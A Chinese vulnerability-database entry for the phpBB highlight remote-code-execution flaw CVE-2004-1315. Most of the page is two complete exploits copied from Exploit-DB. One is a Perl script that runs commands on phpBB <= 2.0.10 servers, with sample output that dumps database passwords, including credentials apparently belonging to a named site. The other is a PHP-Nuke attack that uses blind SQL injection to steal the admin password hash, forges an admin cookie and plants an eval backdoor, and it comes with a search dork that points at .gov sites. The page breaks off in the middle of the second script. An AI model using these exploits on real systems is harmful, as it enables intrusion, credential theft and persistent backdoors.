CVE-2004-1315
CVSS7.5
发布时间 :2004-11-12 00:00:00
修订时间 :2016-10-17 22:53:03
NMCOEPS    

[原文]viewtopic.php in phpBB 2.x before 2.0.11 improperly URL decodes the highlight parameter when extracting words and phrases to highlight, which allows remote attackers to execute arbitrary PHP code by double-encoding the highlight value so that special characters are inserted into the result, which is then processed by PHP exec, as exploited by the Santy.A worm.


[CNNVD]phpBB2 highlight变量二次解码导致远程命令执行漏洞(CNNVD-200411-035)

        
        phpBB是一款由PHP编写的WEB论坛应用程序,支持多种数据库系统,可使用在多种Unix和Linux操作系统下。
        phpBB对highlight变量不正确的二次解码导致远程攻击者可以注入PHP代码执行系统命令。
        由于phpBB的URL解码会把%2527转换成%27(单引号),并没有追加'\'号的,因此可以注入PHP代码执行系统命令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:phpbb_group:phpbb:2.0.4
cpe:/a:phpbb_group:phpbb:2.0.5
cpe:/a:phpbb_group:phpbb:2.0.10
cpe:/a:phpbb_group:phpbb:2.0.2
cpe:/a:phpbb_group:phpbb:2.0.3
cpe:/a:phpbb_group:phpbb:2.0.0
cpe:/a:phpbb_group:phpbb:1.4.4
cpe:/a:phpbb_group:phpbb:2.0.1
cpe:/a:phpbb_group:phpbb:2.0.7a
cpe:/a:phpbb_group:phpbb
cpe:/a:phpbb_group:phpbb:1.2.1
cpe:/a:phpbb_group:phpbb:1.4.0
cpe:/a:phpbb_group:phpbb:1.4.1
cpe:/a:phpbb_group:phpbb:1.4.2
cpe:/a:phpbb_group:phpbb:2.0.8
cpe:/a:phpbb_group:phpbb:1.0.0
cpe:/a:phpbb_group:phpbb:2.0.9
cpe:/a:phpbb_group:phpbb:1.0.1
cpe:/a:phpbb_group:phpbb:2.0.6
cpe:/a:phpbb_group:phpbb:1.2.0
cpe:/a:phpbb_group:phpbb:2.0.7
cpe:/a:phpbb_group:phpbb:2.0_rc1
cpe:/a:phpbb_group:phpbb:2.0_rc2
cpe:/a:phpbb_group:phpbb:2.0.6d
cpe:/a:phpbb_group:phpbb:2.0_rc3
cpe:/a:phpbb_group:phpbb:2.0.6c
cpe:/a:phpbb_group:phpbb:2.0_rc4
cpe:/a:phpbb_group:phpbb:2.0.8a
cpe:/a:phpbb_group:phpbb:2.0_beta1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1315
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1315
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-035
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=110029415208724&w=2
(UNKNOWN)  BUGTRAQ  20041112 phpBB Code EXEC (v2.0.10)
http://marc.info/?l=bugtraq&m=110143995118428&w=2
(UNKNOWN)  GENTOO  GLSA-200411-32
http://marc.info/?l=bugtraq&m=110365752909029&w=2
(UNKNOWN)  BUGTRAQ  20041220 phpBB Worm
http://marc.info/?t=110079440800004&r=1&w=2
(UNKNOWN)  BUGTRAQ  20041118 EXEC exploit in phpBB - fix
http://www.kb.cert.org/vuls/id/497400
(VENDOR_ADVISORY)  CERT-VN  VU#497400
http://www.phpbb.com/phpBB/viewtopic.php?t=240513
(VENDOR_ADVISORY)  CONFIRM  http://www.phpbb.com/phpBB/viewtopic.php?t=240513
http://www.securityfocus.com/archive/1/385208
(UNKNOWN)  BUGTRAQ  20041222 Re: phpBB Worm
http://www.securityfocus.com/bid/10701
(UNKNOWN)  BID  10701
http://www.us-cert.gov/cas/techalerts/TA04-356A.html
(VENDOR_ADVISORY)  CERT  TA04-356A
http://xforce.iss.net/xforce/xfdb/18052
(VENDOR_ADVISORY)  XF  phpbb-view-sql-injection(18052)

- 漏洞信息

phpBB2 highlight变量二次解码导致远程命令执行漏洞
高危 输入验证
2004-11-12 00:00:00 2005-10-20 00:00:00
远程  
        
        phpBB是一款由PHP编写的WEB论坛应用程序,支持多种数据库系统,可使用在多种Unix和Linux操作系统下。
        phpBB对highlight变量不正确的二次解码导致远程攻击者可以注入PHP代码执行系统命令。
        由于phpBB的URL解码会把%2527转换成%27(单引号),并没有追加'\'号的,因此可以注入PHP代码执行系统命令。
        

- 公告与补丁

        厂商补丁:
        phpBB Group
        -----------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.phpbb.com/

- 漏洞信息 (647)

phpBB <= 2.0.10 Remote Command Execution Exploit (EDBID:647)
php webapps
2004-11-22 Verified
0 RusH
N/A [点击下载]
#!/usr/bin/perl

use IO::Socket;

##                     @@@@@@@   @@@  @@@   @@@@@@  @@@  @@@
##                     @@!  @@@  @@!  @@@  !@@      @@!  @@@
##                     @!@!!@!   @!@  !@!   !@@!!   @!@!@!@!
##                     !!: :!!   !!:  !!!      !:!  !!:  !!!
##                      :   : :   :.:: :   ::.: :    :   : :
##
## phpBB <= 2.0.10 remote commands exec exploit
## based on http://securityfocus.com/archive/1/380993/2004-11-07/2004-11-13/0
## succesfully tested on: 2.0.6 , 2.0.8 , 2.0.9 , 2.0.10
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## example...
## he-he-he ... read http://www.phpbb.com/phpBB/viewtopic.php?t=239819
## The third issue, search highlighting, has been checked by us several times and we can do 
## nothing with it at all. Again, that particular group admit likewise. In a future release 
## of 2.0.x we will eliminate the problem once and for all, but as noted it cannot (to our 
## knowledge and as noted, testing) be taken advantage of and thus is not considered by us to 
## be cause for an immediate release.
## heh...
##
## r57phpbb2010.pl www.phpbb.com /phpBB/ 239819 "ls -la"
## *** CMD: [ ls -la ]
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
##   total 507
##   drwxr-xr-x   12 dhn      phpbb         896 Oct 13 18:23 .
##   drwxrwxr-x   19 root     phpbb        1112 Nov 12 15:08 ..
##   drwxr-xr-x    2 dhn      phpbb         152 Oct 13 18:23 CVS
##   drwxr-xr-x    3 dhn      phpbb         944 Jul 19 15:17 admin
##   drwxrwxrwx    5 dhn      phpbb         160 Aug 14 21:19 cache
##   -rw-r--r--    1 dhn      phpbb       44413 Mar 11  2004 catdb.php
##   -rw-r--r--    1 dhn      phpbb        5798 Jul 19 15:17 common.php
##   -rw-r--r--    1 root     root          264 Jul  2 08:05 config.php
##   drwxr-xr-x    3 dhn      phpbb         136 Jun 24 06:40 db
##   drwxr-xr-x    3 dhn      phpbb         320 Jul 19 15:17 docs
##   -rw-r--r--    1 dhn      phpbb         814 Oct 30  2003 extension.inc
##   -rw-r--r--    1 dhn      phpbb        3646 Jul 10 04:21 faq.php
##   drwxr-xr-x    2 dhn      phpbb          96 Aug 12 14:59 files
##   -rw-r--r--    1 dhn      phpbb       45642 Jul 12 12:42 groupcp.php
##   drwxr-xr-x    7 dhn      phpbb         240 Aug 12 16:22 images
##   drwxr-xr-x    3 dhn      phpbb        1048 Jul 19 15:17 includes
##   -rw-r--r--    1 dhn      phpbb       14518 Jul 10 04:21 index.php
##   drwxr-xr-x   60 dhn      phpbb        2008 Sep 27 01:54 language
##   -rw-r--r--    1 dhn      phpbb        7481 Jul 19 15:17 login.php
##   -rw-r--r--    1 dhn      phpbb       12321 Mar  4  2004 memberlist.php
##   -rw-r--r--    1 dhn      phpbb       37639 Jul 10 04:21 modcp.php
##   -rw-r--r--    1 dhn      phpbb       45945 Mar 24  2004 mods_manager.php
##   -rw-r--r--    1 dhn      phpbb       34447 Jul 10 04:21 posting.php
##   -rw-r--r--    1 dhn      phpbb       72580 Jul 10 04:21 privmsg.php
##   -rw-r--r--    1 dhn      phpbb        4190 Jul 12 12:42 profile.php
##   -rw-r--r--    1 dhn      phpbb       16276 Oct 13 18:23 rules.php
##   -rw-r--r--    1 dhn      phpbb       42694 Jul 19 15:17 search.php
##   drwxr-xr-x    4 dhn      phpbb         136 Jun 24 06:41 templates
##   -rw-r--r--    1 dhn      phpbb       23151 Mar 13  2004 viewforum.php
##   -rw-r--r--    1 dhn      phpbb        7237 Jul 10 04:21 viewonline.php
##   -rw-r--r--    1 dhn      phpbb       45151 Jul 10 04:21 viewtopic.php
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## r57phpbb2010.pl www.phpbb.com /phpBB/ 239819 "cat config.php"
## *** CMD: [ cat config.php ]
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
##   $dbms = "mysql";
##   $dbhost = "localhost";
##   $dbname = "phpbb";
##   $dbuser = "phpbb";
##   $dbpasswd = "phpBB_R0cKs";
##   $table_prefix = "phpbb_";
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## rocksss.... 
##
## P.S. this code public after phpbb.com was defaced by really stupid man with nickname tristam...
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## fucking lamaz...
##
## ccteam.ru
## $dbname   = "ccteam_phpbb2";
## $dbuser   = "ccteam_userphpbb";
## $dbpasswd = "XCbRsoy1";
##
## eat this dude...
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

if (@ARGV < 4)
 {
 print q(############################################################
     phpBB <=2.0.10 remote command execution exploit
        by RusH security team // www.rst.void.ru
############################################################
 usage:
 r57phpbb2010.pl [URL] [DIR] [NUM] [CMD]
 params:
  [URL] - server url e.g. www.phpbb.com
  [DIR] - directory where phpBB installed e.g. /phpBB/ or /
  [NUM] - number of existing topic
  [CMD] - command for execute e.g. ls or "ls -la" 
############################################################
 );   
 exit;
 }

$serv  = $ARGV[0];
$dir   = $ARGV[1];
$topic = $ARGV[2];
$cmd   = $ARGV[3];

$serv =~ s/(http:\/\/)//eg;
print "*** CMD: [ $cmd ]\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";

$cmd=~ s/(.*);$/$1/eg;
$cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$topic=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

$path  = $dir;
$path .= 'viewtopic.php?t=';
$path .= $topic;
$path .= '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20';
$path .= $cmd;
$path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F';
$path .= '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] CONNECT FAILED\r\n";

print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";

$on = 0;

while ($answer = <$socket>)
{
if ($answer =~ /^_END_/) { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; exit(); }
if ($on == 1) { print "  $answer"; }
if ($answer =~ /^_START_/) { $on = 1; }
}

print "[-] EXPLOIT FAILED\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";

### EOF ###

# milw0rm.com [2004-11-22]
		

- 漏洞信息 (12510)

Wormable Remote Code Execution in PHP-Nuke 7.0/8.1/8.1.35 (EDBID:12510)
php webapps
2010-05-05 Not Verified
0 Michael Brooks
N/A [点击下载]
#!/usr/bin/php
<?php
/*******************************************************************************
Wormable Remote Code Execution in PHP-Nuke 7.0/8.1/8.1.35(newist as of release)
Vendor's Website:http://phpnuke.org/
Secuirty Researcher: Michael Brooks (https://sitewat.ch)
Original Advisory: http://blog.sitewat.ch/2010/05/vulnerabilities-in-php-nuke.html

Google hack:
"Francisco Burzi"  "Page Generation:"  Seconds inurl:modules.php
1,170,000 results
add inurl:gov to the google hack if you want to make the news ;)
Works with maigic_quotes_gpc=On or Off
Works with AppArmor and Suhosin Hadend-PHP, tested on Ubuntu 9.04 and 10.04
My own LFI+SQLI attack is used to bypass AppArmor!
Also tested XAMPP on Windows XP
All tests where done with MySQL5 and PHP5
To obtain a user's cookie:
1) Register a normal account
2) Login
3) Type this into the same address bar and hit enter: javascript:document.cookie
To set a cookie you can do use this: javascript:document.cookie="admin=MjphZG1pbjoyMTIzMmYyOTdhNTdhNWE3NDM4OTRhMGU0YTgwMWZjMzoxMDo6MDowOjA6MDpEZWVwQmx1ZTo0MDk2"
*******************************************************************************/
set_time_limit(0);
//The blind_sql_injeciton calss is a general exploit framework that we are inheriting.
class php_nuke_blind_sql_injection extends blind_sql_injection {
    //This is the blind sql injection request.
    function query($check){
        //Rate limiter to bypass ipban.php's protection.
        //Must stay below 5 requests every 2 seconds.
        if(!($this->request_count%4)){
            sleep(2);
        }
        //build the http request to Inject a query:
        //This is a simple get request with a custom referer
	     //$this->set_referer("'="/\*"  (select ".$check." from nuke_authors limit 1))-- */");
        $this->set_referer("'=(select ".$check." from nuke_authors limit 1))-- 1");
        /*example get and post request.
        *$this->set_get("id=1 or (select ".$check." from nuke_authors limit 1))";//$_GET[id]
        *$this->set_post("id=1 or (select ".$check." from nuke_authors limit 1))");//$_POST[id]
        */
    }
}
//This is a very efficient blind sql injection class. 
class blind_sql_injection{
    var $url, $backup_url, $result, $http, $request_count, $timeout;
    function blind_sql_injection($url,$timeout=10){
        $this->request_count=0;
        $this->url=$url;
        $this->backup_url=$url;
        $this->http=new http_client();
        $this->timeout=$timeout;
    }
    function set_get($get){
        $this->url=$this->url."?".$get;
    }
    function set_referer($referer){
        $this->http->referer=$referer;
    }
    function set_post($post){
        $this->http->postdata=$post;
    }
    function test_target(){
        return $this->send("if(true,sleep(".$this->timeout."),0)")&&!$this->send("if(false,sleep(".$this->timeout."),0)");
    }
    function num_to_hex($arr){
        $ret='';
        foreach($arr as $a){
            if($a<=9){
                $ret.=$a;
            }else{
                $ret.=chr(87+$a);
            }
        }
        return $ret;
    }
    //Looking for a string of length 32 and base 16 in ascii chars.
    function find_md5($column){
        return $this->num_to_hex($this->bin_finder(16,32,"conv(substring($column,%s,1),16,10)"));
    }
    function find_sha1($column){
        return $this->num_to_hex($this->bin_finder(16,40,"conv(substring($column,%s,1),16,10)"));
    }
    //Look for an ascii string of arbitrary length.
    function find_string($column){
        $ret='';
        //A length of zero means we are looking for a null byte terminated string.
        $result=$this->bin_finder(128,0,"ascii(substring($column,%s,1))");
        foreach($result as $r){
            $ret.=chr($r);
        }
        return $ret;
    }
    //query() is a method that generates the sql injection request
    function query($check){
        //This function must be overridden.
    }
    function recheck($result,$question,$base){
       $this->bin_finder($base,1,$question,$start);
       //Force a long timeout.
       $tmp_timeout=$this->timeout;
       if($this->timeout<10){
          $this->timeout=10;
       }else{
          $this->timeout=$this->timeout*2;
       }
       $l=1;
       foreach($result as $r){
          if($this->send("if(".sprintf($question,$l)."!=".$r.",sleep(".$this->timeout."),0)")){
              $result[]=$b;
              break;
          }
          $l++;
       }
       $this->timeout=$tmp_timeout;
    }
    function linear_finder($base,$length,$question){
        for($l=1;$l<=$length;$l++){
            for($b=0;$b<$base;$b++){
                if($this->send("if(".sprintf($question,$l)."=".$b.",sleep(".$this->timeout."),0)")){
                    $result[]=$b;
                    break;
                }
            }
        }
    }
    #Binary search for mysql based sql injection.
    function bin_finder($base,$length,$question){
         $start_pos=1;
        $result='';
        for($cur=$start_pos;$cur<=$length||$length==0;$cur++){
            $n=$base-1;
            $low=0;
            $floor=$low;
            $high=$n-1;
            $pos= $low+(($high-$low)/2);
            $found=false;
            while($low<=$high&&!$found){
                #asking the sql database if the current value is greater than $pos
                if($this->send("if(greatest(".sprintf($question,$cur).",".$pos.")!=".$pos.",sleep(".$this->timeout."),0)")){
                    #if this is true then the value must be the modulus.
                    if($pos==$n-1){
                       $result[]=$pos+1;
                       $found=true;
                    }else{
                        $low=$pos+1;
                    }
                #asking the sql database if the current value is less than $pos
                }else if($this->send("if(least(".sprintf($question,$cur).",".$pos.")!=".$pos.",sleep(".$this->timeout."),0)")){
                   #if this is true the value must be zero, or in the case of ascii,  a null byte.
                   if($pos==$floor+1){
                        $found=true;
                        #We have found the null terminator so we have finnished our search for a string.
                        if($length==0){
                            $length=-1;
                        }else{
                            $result[]=$pos-1;
                        }
                    }else{
                        $high=$pos-1;
                    }
                }else{
                    #both greater than and less then where asked, so so then the answer is our guess $pos.
                    $result[]=$pos;
                    $found=true;
                }
                $pos=$low+(($high-$low)/2);
            }
            print(".");
        }
        return $result;
    }
    //Fire off the request
    function send($quesiton){
        //build the injected query.
        $this->query($quesiton);
        $start=time();
        $resp=$this->http->send($this->url);
        //backup_url is for set_get()
        $this->url=$this->backup_url;
        $this->request_count++;
        return (time()-$start>=$this->timeout);
    }
    //retroGod RIP
    function charEncode($string){
        $char="char(";
        $size=strlen($string);
        for($x=0;$x<$size;$x++){
            $char.=ord($string[$x]).",";
        }
        $char[strlen($char)-1]=")%00";
        return $char;
    }
}
//General purpose http client that works on a default php install. 
class http_client{
    var $proxy_ip='', $proxy_port='', $proxy_name='', $proxy_pass='', $referer='',$cookie='',$postdata='';
    function send($loc){
         //overload function polymorphism between gets and posts
         $url=parse_url($loc);
         if(!isset($url['port'])){
            $url['port']=80;
        }
         $ua='Firefox';
         if($this->proxy_ip!=''&&$this->proxy_port!=''){
            $fp = pfsockopen( $this->proxy_ip, $this->proxy_port, &$errno, &$errstr, 120 );
            $url['path']=$url['host'].':'.$url['port'].$url['path'];
         }else{
            $fp = fsockopen( $url['host'], $url['port'], &$errno, &$errstr, 120 );
         }
         if( !$fp ) {
            print "$errstr ($errno)<br>\nn";
            return false;
         } else {
            if( $this->postdata=='' ) {
                $request="GET ".$url['path']."?".$url['query']." HTTP/1.1\r\n";
            } else {
                $request="POST ".$url['path']."?".$url['query']." HTTP/1.1\r\n";
            }
            if($this->proxy_name!=''&&$this->proxy_pass!=''){
                $request.="Proxy-Authorization: Basic ".base64_encode($this->proxy_name.":".$this->proxy_pass)."\r\n\r\n";
            }
            $request.="Host: ".$url['host'].":".$url['port']."\r\n";
            $request.="User-Agent: ".$ua."\r\n";
            $request.="Accept: text/plain\r\n";
            if($this->referer!=''){
                $request.="Referer: ".$this->referer."\r\n";
            }
            $request.="Connection: Close\r\n";
            if($this->cookie!=''){
                $request.="Cookie: ".$this->cookie."\r\n" ;
            }
            if( $this->postdata!='' ) {
                $strlength = strlen( $this->postdata );
                $request.="Content-type: application/x-www-form-urlencoded\r\n" ;
                $request.="Content-length: ".$strlength."\r\n\r\n";
                $request.=$this->postdata;
            }
            fputs( $fp, $request."\r\n\r\n" );
               while( !feof( $fp ) ) {
                   $output .= fgets( $fp, 1024 );
               }
            fclose( $fp );
            //php_nuke only:
            if(strstr($output,"too many page loads")){
                print "REQUEST CAP HIT!\n";
                print_r(debug_backtrace());
                print "REQUEST CAP HIT!\n";
                die();
            }
            return $output;
         }
    }
    //Use a http proxy
    function proxy($proxy){ //user:pass@ip:port
        $proxyAuth=explode('@',$proxy);
        if(isset($proxyAuth[1])){
            $login=explode(':',$proxyAuth[0]);
            $this->proxy_name=$login[0];
            $this->proxy_pass=$login[1];
            $addr=explode(':',$proxyAuth[1]);
        }else{
            $addr=explode(':',$proxy);
        }
	     $this->proxy_ip=$addr[0];
        $this->proxy_port=$addr[1];
    }
    //Parses the results from a PHP error to use as a path disclosure.
    function getPath($url,$pops=1){
        $html=$this->send($url);
        //Regular error reporting:
        $resp=explode("array given in <b>",$html);
        if(isset($resp[1])){
            $resp = explode("</b>",$resp[1]);
        }else{
            //xdebug's error reporting:
            $resp=explode("array given in ",$html);
            if(isset($resp[1])){
                $resp = explode(" ",$resp[1]);
            }else{
                $resp[0]=false;
            }
        }
        $path=$resp[0];
        //Can't use dirname()
        if(strstr($path,"\\")){
           $p=explode("\\",$path);
           for($x=0;$x<$pops;$x++){
               array_pop($p);
           }
           $path=implode("\\",$p);
        }else{
           $p=explode("/",$path);
           for($x=0;$x<$pops;$x++){
               array_pop($p);
           }
           $path=implode("/",$p);
        }
        return $path;
    }
    //Grab the server type from the http header.
    function getServer($url){
        $resp=$this->send($url);
        $header=explode("Server: ",$resp);
        $server=explode("\n",$header[1]);
        return $server[0];
    }
}
function main(){
   $user_input=getopt("t:c:a:");
   if($user_input['t']){
      $attack_url=$user_input['t'];
      if($user_input['c']){
         $user_cookie=$user_input['c'];
      }
      //This is only useful for debugging,  so its not listed in the useage.
      if($user_input['a']){
         $admin_cookie=$user_input['a'];
      }
   }else{
      print("Useage: ./php_exploit -t http://localhost\n");
      die("A user's cookie is required for 8.1.35 : ./php_exploit -t http://localhost -c user=MjphZG1pbjo1ZjRkY2MzYjVhYTc2NWQ2MWQ4MzI3ZGViODgyY2Y5OToxMDo6MDowOjA6MDo6NDA5Ng==\n");
   }
   $attack_url=str_replace("index.php","",$attack_url);
   $http=new http_client();
   $sex=new php_nuke_blind_sql_injection($attack_url."/");
   if(!$admin_cookie){
	  //This is what a cookie looks like:
	  //2:user_name:21232f297a57a5a743894a0e4a801fc3:10::0:0:0:0:DeepBlue:4096
	  //$user_cookie="user=MjphZG1pbjoyMTIzMmYyOTdhNTdhNWE3NDM4OTRhMGU0YTgwMWZjMzoxMDo6MDowOjA6MDpEZWVwQmx1ZTo0MDk2";
	  if($user_cookie){
        print "Using cookie...\n";
        $http->cookie=$user_cookie;
        //1337+30000 is used as a pivot in parsing,  and to test for a sucessful injection.
        //This is NOT Blind SQL Injection,  we will be reading the result.  This attack works with magic_quotes_gpc on or off.
        $http->postdata="title=wow\\&bodytext=/*&mood=".urlencode("'*/,0,0,1337+30000,(select aid from nuke_authors limit 1),0,(select pwd from nuke_authors limit 1),1337+30000)-- 1")."&status=no&submit=Add+New+Entry";
        $response=$http->send($attack_url."/modules.php?name=Journal&file=savenew");
        //This part of the exploit is a bit strange sorry for the mess,  gotta realease!
        if(strstr($response,"javascript:history.go(-1)")){
            //magic_quotes_gpc=on
            $http->postdata="title=wow&jbodytext=text&mood=".urlencode("',1337+30000,(select aid from nuke_authors limit 1),0,(select pwd from nuke_authors limit 1),1337+30000)-- 1")."&status=no&submit=Add+New+Entry";
            $response=$http->send($attack_url."/modules.php?name=Journal&file=savenew");
            $http->postdata='';
            //Find the primary key of the journal entry we just created.
            $jid=$http->send($attack_url."/modules.php?name=Journal&file=edit");
            //we should have the single quote that we escaped at the end of wow'
            $jid=explode("\">wow<",$jid);
            $jid=explode("jid=", $jid[0]);
            //Check the journal for the admin's username/password hash
            $response=$http->send($attack_url."/modules.php?name=Journal&file=display&jid=".$jid[1]);
            if(strpos($response,"31337")){
               list($junk,$aid,$pwd)=explode("31337 @ ",$response);
               $aid=explode("<",$aid);
               $pwd=explode("<",$pwd);
               $user_name=$aid[0];
               $pass_hash=$pwd[0];
            }else{
               //magic_quotes_gpc=off
               sleep(3);
               $http->postdata="title=wow\\&jbodytext=/*&mood=1&status=".urlencode("no',(select aid from nuke_authors limit 1),(select pwd from nuke_authors limit 1))-- 1")."&submit=Add+New+Entry";
               $response=$http->send($attack_url."/modules.php?name=Journal&file=savenew");
               sleep(2);
               $jid=$http->send($attack_url."/modules.php?name=Journal&file=edit");
               $jid=explode("\">wow<",$jid);
               $jid=explode("jid=", $jid[0]);
               $jid=explode("\">",$jid[1]);
               //Check the journal for the admin's username/password hash
               $response=$http->send($attack_url."/modules.php?name=Journal&file=display&jid=".$jid[0]);
               $inj=explode("Last updated on ",$response);
               $inj=explode(" @ ",$inj[1]);
               $pass_hash=$inj[0];
               $inj=explode("<",$inj[1]);
               $user_name=$inj[0];
            }
        }else{
            $http->postdata='';
            //Find the primary key of the journal entry we just created.
            $jid=$http->send($attack_url."/modules.php?name=Journal&file=edit");
            //we should have the single quote that we escaped at the end of wow'
            $jid=explode("\">wow',<",$jid);
            $jid=explode("jid=", $jid[0]);
            //Check the journal for the admin's username/password hash
            $response=$http->send($attack_url."/modules.php?name=Journal&file=display&jid=".$jid[1]);
            if(!strpos($response,"31337")){
               die("target has patched!\n");
            }else{
               print "Target vulnerable to a privilege escalation attack!!!\n";
               list($junk,$aid,$pwd)=explode("31337 @ ",$response);
               $aid=explode("<",$aid);
               $pwd=explode("<",$pwd);
               $user_name=$aid[0];
               $pass_hash=$pwd[0];
            }
         }
	   }else{
         $sex->sleep="sleep(5)";
         print "Starting Attack Against:".$attack_url."/\n";
         print "Testing for blind sql injection...\n";
         if(!$sex->test_target()){
             print("Target might be running 8.1.35\n");
             print("Try the privilege esciation attack to upload the shell:");
             die("./php_exploit -t http://localhost -c user=MjphZG1pbjo1ZjRkY2MzYjVhYTc2NWQ2MWQ4MzI3ZGViODgyY2Y5OToxMDo6MDowOjA6MDo6NDA5Ng==\n");
         }
         print "Target is vulnerable to blind sql injection!!!\n";
         print "Please Standby For Attack...\n";
         $pass_hash=$sex->find_md5("pwd");
         $user_name=$sex->find_string("aid");
         print "attacked used:".$sex->request_count." requests.\n";
	    }
	    print "Found Admin's name:".$user_name."\n";
	    print "Found MD5 Password hash:".$pass_hash."\n";
	    $admin_cookie="admin=".base64_encode($user_name.":".$pass_hash.":").";";
    }
    print "Using Admin Session ID:\n".$admin_cookie."\n";
    $http->cookie=$admin_cookie;
    //ipban.php
    sleep(3);
    //This request will tell us what version of php-nuke it is.
    //If it is 8, Then the page gives us configuration information to perserve.
    $admin_options=$http->send($attack_url."/admin.php?op=general");
    if(!strstr($admin_options,"Content-Length: 0")){
        print "PHP-Nuke 8 detected.\n";
        $option_values=explode("value='",$admin_options);
        $x=0;
        array_shift($option_values);
        //Parsing out and storing configuration values to restore them after the hack. 
        foreach( $option_values as $value){
            $value=explode("'",$value);
            $values[]=urlencode($value[0]);
            if($x++==4)
                break;
        }
        //ipban.php
        sleep(2);
        //Enable error reporting
        $http->postdata="xsitename=".$values[0]."&xnukeurl=".$values[1]."&xslogan=".$values[2]."&xstartdate=".$values[3]."&xadmingraphic=".$values[4]."&xgfx_chk=0&xnuke_editor=1&xdisplay_errors=1&op=savegeneral";
        $error_reporting=$http->send($attack_url."/admin.php");
        //Path diclosure in add_pwd.  We will trigger a warning by passing md5() the array add_pwd[].
        $http->postdata="add_name=junk&add_aid=junk&add_email=junk&add_url=junk&add_admlanguage=&auth_modules%5B%5D=23&add_radminsuper=1&add_pwd[]=junk&op=AddAuthor";
        $remote_path=$http->getPath($attack_url."/admin.php",3);
        sleep(2);
        if(strstr($remote_path,':\\')){
            print "Windows box detected.\n";
            print "Remote path:$remote_path\n";
            print "Uploading backdoor...\n";
            $remote_path=addslashes(addslashes($remote_path."\\frontend.php"));
            $backdoor='get_magic_quotes_gpc()?eval(stripslashes($_GET["e"])):eval($_GET["e"])';
            //Could have used a concat but php-nuke filters for it.  This hides <> from the xss filter.
            //union/**/ bypasses the sql injection filter on line 414 in ./mainfile.php
            $http->postdata="chng_uid=".urlencode("' union/**/ select ".$sex->charEncode("<?php").",'".$backdoor."',".$sex->charEncode("?>").",'','','','','','','','','','','','','','','' into outfile '".$remote_path."'-- 1");
            $re=$http->send($attack_url."/admin.php?op=modifyUser");
            //Disable error reporting
            $http->postdata="xsitename=".$values[0]."&xnukeurl=".$values[1]."&xslogan=".$values[2]."&xstartdate=".$values[3]."&xadmingraphic=".$values[4]."&xgfx_chk=0&xnuke_editor=1&xdisplay_errors=0&op=savegeneral";
            $error_reporting=$http->send($attack_url."/admin.php");
        }else{
            print "*nix box detected.\n";
            print "Remote path:$remote_path\n";
            //Is mysql on the same machine as the httpd?
            sleep(2);
            $http->postdata="chng_uid=".urlencode("' or 1=(select if(substring(load_file('".$remote_path."/index.php'),1,1)='<',0,1))-- 1");
            $mysql_check=$http->send($attack_url."/admin.php?op=modifyUser");
            if(strstr($mysql_check,"User Doesn't Exists!")){
                print("MySQL isn't on the same machine or you do not have file privileges.\n");
                die("Remote code execution failed\n");
            }
            print "Uploading backdoor...\n";
            //ipban.php
            sleep(2);
            //Grab the theme,  this is needed to repair the database after the LFI
            $theme=$http->send($attack_url."/admin.php?op=themes");
            $theme=explode('src="themes/',$theme);
            $theme=explode('/images/',$theme[1]);
            //Repair the database after the LFI.
            $backdoor_installer='function OpenTable(){} function themeheader(){} $db->sql_query("update ".$prefix."_config set Default_Theme='.$sex->charEncode($theme[0]).', display_errors=0");';
            //This is a magic_quotes_gpc and mysql safe backdoor that fits on one line.
            $backdoor='get_magic_quotes_gpc()?eval(stripslashes(".chr(36)."_GET[".chr(34)."e".chr(34)."])):eval(".chr(36)."_GET[".chr(34)."e".chr(34)."])';
            //Install the backdoor in a relitive directory.
            $backdoor_installer.='file_put_contents($_SERVER["DOCUMENT_ROOT"].dirname($_SERVER["SCRIPT_NAME"])."/frontend.php",chr(60)."?php '.$backdoor.'?".chr(62));';
            //charEncode is used to bypass XSS filters.
	         //union/**/ bypasses the sql injection filter on line 414 in ./mainfile.php
            $http->postdata="chng_uid=".urlencode("' union/**/ select ".$sex->charEncode("<?php").",'".$backdoor_installer."',".$sex->charEncode("?>").",'','','','','','','','','','','','','','','' into outfile '/tmp/theme.php'-- 1");
            $http->send($attack_url."/admin.php?op=modifyUser");
            sleep(2);
            //local file include vulnerablity to execute /tmp/theme.php
